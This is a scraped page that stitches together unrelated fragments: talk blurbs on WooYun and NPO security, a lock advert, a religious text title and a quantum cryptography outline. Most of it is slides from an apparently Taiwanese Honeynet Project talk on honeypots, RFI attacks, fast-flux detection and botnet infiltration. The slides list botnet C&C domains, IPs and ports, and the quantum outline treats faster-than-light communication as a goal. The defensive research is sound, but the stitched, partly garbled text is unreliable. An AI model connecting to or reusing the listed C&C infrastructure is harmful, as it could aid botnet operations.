New immune system of information security from CHINA by WooYun - CODE BLUE 2015CODE BLUE
This talk is about the introduction of Wooyun.
WooYun is a platform where security researchers report vulnerabilities and vendors give feedbacks. While WooYun follows vulnerabilities, it also provides researchers a platform for public interests, study, communication, and research.I will introduce how WooYun works and why we start this project in my presentation, also what WooYun changes in the security circle in China, and why, when, where it built, how it developed and the difficulties when developing.
所謂:知己知彼,才能百戰百勝!
本次活動我們將請Allen來分享近期常見的駭客攻擊手法,例如癱瘓伺服器、竊取個資、詐騙金錢等,若知道這些攻擊的手法,相信NPO未來在應對上將更遊刃有餘,歡迎大家踴躍來參加.
簡報出處:
NPO 要知道的資訊安全 Allen Own
https://speakerdeck.com/allenown/npo-yao-zhi-dao-de-zi-xun-an-quan
New immune system of information security from CHINA by WooYun - CODE BLUE 2015CODE BLUE
This talk is about the introduction of Wooyun.
WooYun is a platform where security researchers report vulnerabilities and vendors give feedbacks. While WooYun follows vulnerabilities, it also provides researchers a platform for public interests, study, communication, and research.I will introduce how WooYun works and why we start this project in my presentation, also what WooYun changes in the security circle in China, and why, when, where it built, how it developed and the difficulties when developing.
所謂:知己知彼,才能百戰百勝!
本次活動我們將請Allen來分享近期常見的駭客攻擊手法,例如癱瘓伺服器、竊取個資、詐騙金錢等,若知道這些攻擊的手法,相信NPO未來在應對上將更遊刃有餘,歡迎大家踴躍來參加.
簡報出處:
NPO 要知道的資訊安全 Allen Own
https://speakerdeck.com/allenown/npo-yao-zhi-dao-de-zi-xun-an-quan
Công Ty Cổ Phần Protocol - Độc quyền Kaba tại Việt Nam.
http://protocol.com.vn
LH : Mr.Danh - 094.3939.795
Mr.An - 0979.60.99.37
Phân phối độc quyền khóa căn hộ, khách sạn Kaba Probuck tại Việt Nam. Khóa vân tay kỹ thuật số Kaba Probuck L710-712 thích hợp cho những căn hộ, khách sạn, phòng riêng,...Lưu trữ 100 vân tay, 5 password.
الراتب الشهير للحبيب عبد الله بن علوي الحداد
"RATIB AL-HADDAD"
(Famous Litany of Imam 'Abdullah Al-Haddad)
REFLECTIONS: CONDUCTED BY
USTAZ ZHULKEFLEE HJ ISMAIL
LESSONS ON VARIOUS
DEVOTIONAL PRACTICES OF
“Qutb-al-Irshaad Imam ‘Abdullah ‘Alawi al-Haddad”
Quantum Entanglement - Cryptography and CommunicationYi-Hsueh Tsai
1. Introduction 2. Quantum Entanglement 3. Quantum Cryptography - Quantum Key Distribution 4. Physical Limit for E2E Time Delay - Speed of Light 5. Shorten E2E Delay - Faster-Than-Light Communication 6. Conclusions
To improve communication security, quantum cryptography could be considered. 2. To shorten E2E delay, technology regarding Faster-ThanLight (FTL) communication is required.
網路安全是一個特殊的研究領域,其中一個原因是在網路安全問題中,"對手"不是文字、影像或任何形式死板板的資料,而是活生生的人;這些製造問題的黑客 (black hat hackers) 終日找尋各種系統及網路漏洞,企圖提出更高明的攻擊方式來獲取各種可能的利益。因此,在網路安全研究中,我們無法"預設"黑客會有什麼樣的攻擊行為,而必須從真正的資料中尋找蛛絲馬跡,從大量資料中發現及解決各種已發生或將發生可能危害使用者資料安全及隱私的行為。在這場研究中,我將介紹 data-driven network security research 並以幾個實際的研究案例來展示真實資料的統計分析可以幫助我們解決什麼樣的安全問題。
24. Page § 24
這是事實…..
§ Hacking is easy and cheap.
§ You will be a victim anytime and anywhere
§ Hackers love your information, computer, network and your money
§ Hacking market is very mature
24
37. Page § 37 37
The Honeynet Project
§ The Honeynet Project is an organization dedicated to
answering these questions. It studies the bad guys and
shares the lessons learned.
– What specific threats do computer networks face from hackers?
– Who's perpetrating these threats and how?
§ The group gathers information by deploying networks (called
honeynets) that are designed to be compromised.
38. Page § 38
The Honeynet Project
§ The Honeynet Project is a non-profit, research organization
improving the security of the Internet at no cost to the public
by providing tools and information on cyber security threats.
39. Page § 39
Mission Statement:
To learn the tools, tactics, and motives of the
blackhat community, and share the lessons
learned.
n Goals :
n Awareness: To raise awareness of the threats that
exist.
n Information: Aware, teach and inform about the threats.
n Research: To give organizations the capabilities to learn
more on their own.
39
41. Page § 41
The Honeynet Project History
1999
2000
2001
2002
2003
2004
2005
2006
2007
2008
2009
Member organized
in Wargames
mailing list
Lance
Spitzner
officially become
Honeynet
Project
Organize
Research
Alliance
啟動Annual
Workshop機制
Funded
Google Code
Project
High-Interaction
Honeywall CDROM ROO
正式推出
Client Honeypot
技術發展
Virtual Honeypot
觀念與技術發展
⾄至今共有41個
國家成⽴立⽀支會
GDH Project
全球分散式誘捕
系統佈建
有限資源
最⼤大利⽤用
⾼高互動式誘捕網路
捕捉新型攻擊⼿手法
網站攻擊⾏行
為猖獗
全球誘捕
網建⽴立
分享各國資
安發展現況
42. Page § 42
Honeynet Project Organization
Characteristics:
– Not-profit (501c3) organization
– Trusted relationship for full members.
– Works virtually around the world.
42
43. Page § 43
Activities
§ KYE Papers
§ Forensics Challenge
§ Open Source Tools Development
§ Global Distributed Honeynet (GDH II )
§ Google Summer Code (GSoC) Project
§ Annual Closed Workshop
44. Page § 44
Annual Workshop
§ 2009 Annual Workshop:
– 2009年2⽉月25⽇日⾄至2⽉月28⽇日於⾺馬來
⻄西亞吉隆坡舉辦
– 全球共70⼈人參與 (Closed Meeting)
會議中討論:
– 共15個國家介紹⺫⽬目前研究發展
現況,組織運作現況
– 訂定重要R&D計畫,跨國共同合作
– 技術交流,經驗與研究分享
– 讓各⽀支會成員互相交流,建⽴立
Trusted Relationship
– Hands-on Training Courses
44
We are
here !
2007年
2009年
52. Page § 52
1.
利⽤用網站弱點以及RFI攻擊
⼿手法,
Site
A 變成駭客的Host
Proxy,
駭客可透過A控制Bot
Compromise
Web
A
網頁掛馬
將Malicious
Code植⼊入Page,
回報站
1.
使⽤用者瀏覽網⾴頁,
即下載惡意程式,中毒
回報IP,Email,使⽤用者帳號,
作業系統,CPU,MSN
(Web
,
Smtp)
下載更多惡意程式
寄發內含釣⿂魚連結
假冒信件
洩漏隱私
性資料
Malicious
Web
+
RFI
+
Fast-‐Flux+
Phishing
=
完整的駭客社群⾦金流體系
申請一個網域
名稱
3322.org
2.
建⽴立Malware
File
Server
SMTP
Server
SMTP
Server
Malicious
Web Site B2
Malicious
Web Site B1
3322.org
3322.org Malicious
Web Site B3
3322.org
Phishing
Web Site C1
3322.org Phishing Web
Site C2
3322.org
59. Page § 59
Thinking … 誘捕網路/誘捕系統設計起源
§ A lot of information to provide us :
– Firewall , IPS, Negios, System Logs, …..
– Authorized access, unauthorized connection, unusual
connections, abnormal behaviors, …
§ However, what is critical information for network
administrators ?
§ To Solve : finding a needle in a haystack
§ Good Solution : Honeypot Honeynet
59
60. Page § 60
誘捕系統(Honeypot)介紹
60
§ General Purpose :
– Designed operation systems, services or vulnerabilities
around your networks to be probed and hacked.
– All data collected is of high value and unpolluted
§ What is Honeypot ? (單點)
– Honeypot 為⼀一個設計為運作中且無營運價值之系統,被
⽤用來當作駭客攻擊⺫⽬目標,⽤用來學習駭客活動與⾏行為,並
收集網路威脅的相關資訊
– 運作模式: 模擬特定的服務與作業系統來運作,並對進
出的資料進⾏行監控、捕獲,提供研究分析
70. Page § 70
Remote File Inclusion說明 (Cont.)
§ Remote File Inclusion (RFI,遠端檔案引⼊入) ,並⾮非是⼀一種
新型攻擊,隨著殭屍網絡的橫⾏行,現在已成為⼀一種攻擊主流。
§ 駭客/殭屍電腦,嘗試尋找有RFI弱點的網⾴頁應⽤用程式 網⾴頁伺服
器(Web Server),控制受害網⾴頁伺服器執⾏行遠端可執⾏行碼,
藉由執⾏行碼的運⾏行,駭客將可⼊入侵受害電腦,取得控制權。
70
Step 1: Try to Inject (Testing Code A) into target webpage
Injec
t
OK
Step 2: if OK, hackers can
inject (Executable Code A )
to control host B
Step 3: Exploit this host and get
root access authority
A: RFI attack site B: Target Site
79. Page § 79
誘捕網路 (Honeynet) 介紹
§ 所要解決的問題:
§ How can we collect more information and defend
against enemy, when we don’t even know who the
enemy is?
如何能夠收集駭客⼀一連串攻擊⾏行為,⽽而不被發現有⼈人
在觀察?
§ Honeypot為單⼀一資料收集點,所能收集到的資料⾮非常
有限,如何可以看到全⾯面性且完整的駭客攻擊資訊
§ 誘捕網路為⼀一個完整的真實網路,主要開放給駭客進
⾏行攻擊,並能夠藉由網路學習駭客的攻擊⾏行為
§ 藉由Honeynet環境建置,能夠對所有進出的流量加以
收集與監控
83. Page § 83 83
Honeynet 說明⽰示意圖
router
Host 1 Host N
...
Server 1 Server N
Honey Host 1
Honey Host N
...
Management Host
eth1
eth0
eth2
HoneyWall
HoneyNet
...
84. Page § 84
84
Honeywall CDROM ROO架構
§ 資料捕捉機制(Data Capture):
§ Firewall Log、Snort、Sebek
INTERNET
Honeywall
無設限條件
連線限制 過濾攻擊行為封包
Sendmail Mail
Server
Oracle DataBase
Server
DNS
Server
MS-SQL DataBase
Server
Apache Web
Server
Honeynet
96. Page § 96
誘捕⼯工具分類:
分析
工具
Network
Connection
Web App.
Malware
Client-Side
Behavior
PCAP file
l Capture-BAT: Win32 Operation System Behavior Analysis Tool
l Honeysnap: Used for extracting and analyzing data
DNS l Tracker: Used to find domains resolving, track hostnameà IP
EXE file l Pehunter: grabs Windows executables off the network
l Honeymole: Setup Honeyfarm multiple sensors that redirect
traffic to a centralized collection of honeypots.
l Honeywall CD ROM: Create a network architecture for
capturing attacks
l Honeystick: It includes both the Honeywall and honeypots
from a single, portable device
l Honeyd: Low-interaction used for capturing attacker activity
l Honeytrap: Capture Novel attacks against network services
l Google Hack Honeypot :
l HIHAT: transfer PHP application to Honeypot
誘捕
工具
l Nepenthes: emulate known vulnerabilities to download malware
l HoneyC: Low interaction Client Honeypot
l Capture-HPC: High-Interaction Client Honeypot
113. Page § 113
Fast-Flux Domain Detection
A Hierarchical FF Detection Method:
Flux-score: Thorsten Holz, et. al., “Measuring and Detecting Fast-Flux Service Networks,”
in Proceedings of the 15th Network Distributed System Security Symposium (NDSS), 2008.
§ Phase 1: (Detect the FF domain and CDNs)
– Use different behavior conditions of FF to detect FF domain
– If it satisfies more than 4 conditions, it may be a ambiguous domain
which may be FF or the domain using CDNs
§ Phase 2: (Detect the FF domain exactly)
– Use Flux-score to further detect the FF domain from the ambiguous
domain
115. Page § 115
Fast-Flux Domain Detection
§ 惡意變動網域:
A record所對應之ASN
皆⼤大部分為不同
IP位置差異性⾼高於B Class
115
116. Page § 116
Inside the botnets : Methodology
2. Sample
Analysis
• Sample analysis to
extract CC information
(IP, nickname, passwd,
channel, command)
• Analysis Tools:
1. CWSandbox / Anubis
2. VirusTotal
3. Libemu: Shellcode
4. Pkaii: PHP Analyzer
3. Infiltration
• Send the bot to join CC
server
• Collect command, traffic and
activities insides CC
• Monitoring Tools:
1. rishi: bot traffic monitor
2. infiltrator:
3. Xchat + vmware
1. Collection
• Honeypot Technology
1. Malware collect HP
2. Malicious RFI HP
3. Malicious Web HP
• Honeypot Tools :
1. Nepenthes
2. mwcollectd
3. Glastof / HIHAT
4. CaptureHPC
5. PhoneyC
117. Page § 117
Inside the botnets : Methodology (Cont.)
4. Feedback
• Collect network pcap files
• Feedback information to
IRC server (command,
botIP, attacked targets)
• Feedback Tools:
1. Scripts by myself
2. IRC server
3. weechat
5. Analysis
• Data analysis using
search engine tool
• Data Visualization for
pcap traffic analysis
• Analysis Tools:
1. tshark
2. chaosreader
3. Splunk free version
4. Picviz
6. Reporting
• Share data with trusted
organizations
• Ticket System:
1. OTRS2 (npt ready)
118. Page § 118
1. Collection : (Cont.)
§ Using HONEYPOT technology to collect attacking data and
malicious samples
§ Why we use honeypot on data collection?
– Objective: Get infected hosts and capture malicious content
– Infected host with vulnerabilities may probe and attack honeypot with
the same vulnerability emulated.
Honeypot
138. Page § 138
2. Sample Analysis
Malware
DB
Anti-Virus
Behavior
Analysis
Static
Analysis
Sandbox
Real-Testbed
Sample
Profiling
Profile :
n Activities on OS : Registry, Process, File
n Connection on Network: Propagation, Remote Controller
n Signature Generation
139. Page § 139
2. Sample Analysis:
Binary Samples using CWsandbox and Anubis
1. Network Activity to get CC Information
2. Setup Virtual Lab and execute samples
for getting CC information
146. Page § 146
3. Infiltration Feedback
Binary Samples
• Send the bot to join CC server
• Collect command, traffic and activities insides CC
Rishi
PHP
execute RFI Samples
Winxp
wireshark
xchat CC Samples
Snort-Inline
CC
Servers
Activities collecting and
analzing
(No execute)
Switch
Virtual Machine
IRC server
Pool
Feedback
Data-Feed
(Execute RFIScripts)
(Execute Samples)
147. Page § 147
3. Infiltration ( Cont.)
§ 收集 Live CC Server後,啟動Bot加⼊入CC Server,監控並記錄CC
Server 內所發⽣生的事件。
CC Observation
153. Page § 153
3. Infected Hosts 來源國家分布統計:
共有4677個攻擊來源,分屬36個國家 (2010/05/05 Update)
Taiwan
(1264攻擊來源)
27%
China (965)
21%
Russian
(373)
8%
Japan (349)
7%
Malaysia (227)
5%
Unite States (468)
10%
Canada (132)
3%
Romania(110)
2%
Korea(119)
3%
French(98)
2%
Others(336)
7%
German(236)
5%
攻擊來源國家分佈圖
Taiwan (1264攻擊來源)
China (965)
Russian (373)
Japan (349)
Malaysia (227)
Unite States (468)
Canada (132)
Romania(110)
Korea(119)
French(98)
Others(336)
German(236)
154. Page § 154
中繼站 Botnet種類 分佈國家
rep3le.locean-‐indien.com IRC
(6667
TCP) France
symantec.loves.the.cock.pheer.biz IRC
(18067
TCP) US
getsome.minilauncher.net IRC
(62567TCP) CN
n0n0.d0d0n0.info IRC
(8585
TCP) US
213.202.205.171 IRC
(6667
TCP) DE
online.ircstyle.net IRC
(6667
TCP) Netherlands
manz.urshell.com IRC
(7000
TCP) US
123.dragonbreath.ru
IRC
(3195
TCP) US,
RU
KR
(Fast-‐Flux)
camelot.blacknight.ie
WWW(80)
MailServer(25) Ireland
avgw.enternet.hu
SMTP
(25)
US
Web2.denirulz.com
www
(81
TCP)
Netherlands
capdr.com www
(80
TCP) DE
(h$p://capdr.com/feed/)
xx.nadnadzz.info
IRC
(10324
TCP)
US
(X)
Priv.gigaservice.it
IRC
(55003
TCP)
UE,
DE
CN
(Fast-‐Flux)
nhg1.cjb.net
IRC
(4244
TCP) RU
shops.vaiosys.com
IRC
(1234
TCP)
US,
CN
xx.ka3ek.com
IRC
(8080
TCP)
CN, MY, US (Fast-Flux)
botz.noretards.com
IRC (65146 TCP) FR
Ganbang.my3jn.org
IRC
(43000
TCP)
US
Scan.kizlarevi.net
IRC
(4646
TCP)
DE
Wmim.solu3onofmsn.org
IRC
(1234
TCP)
US
Fix.drshells.com
IRC
(5555
TCP)
PORTUGAL
60.10.179.100
IRC
(8680
TCP)
CN
More than 100 bots in the C C Server
155. Page § 155
4. Live CC Server Statistics:
§ 45 live CC Servers (Testing on June 30th),其中有三個
CC Servers,控制多過於300個Bots
US (8)
18%
JP (6)
13%
CN (7)
16%
RU (4)
9%
DE (4)
9%
FR (2)
4%
NL (2)
4%
MY (4)
9%
CA (3)
7%
Others (5)
11%
US (8)
JP (6)
CN (7)
RU (4)
DE (4)
FR (2)
NL (2)
MY (4)
CA (3)
Others (5)
156. Page § 156
4. Live CC Server 分佈 ( 2010/06/30 update):
v
vvv vv
vv
157. Page § 157
5. Real Bots Connection to CC Server
§ 期間:2010/01/01 ~2010/06/30
§ 監控40~78個 CC Servers (HTTP, IRC) ,Bots 規模⾄至少60以上
14024
11095
26037
24165
158. Page § 158
5. Real Bots Inside the Botnet 國家分布
US:15.69%
169. Page § 169
個⼈人隱私資料洩漏事件增加快速
§ 資料來源:http://datalossdb.org/statistics The Open Security Foundation's DataLossDB gathers
information about events involving the loss, theft, or exposure of personally identifiable information
(PII).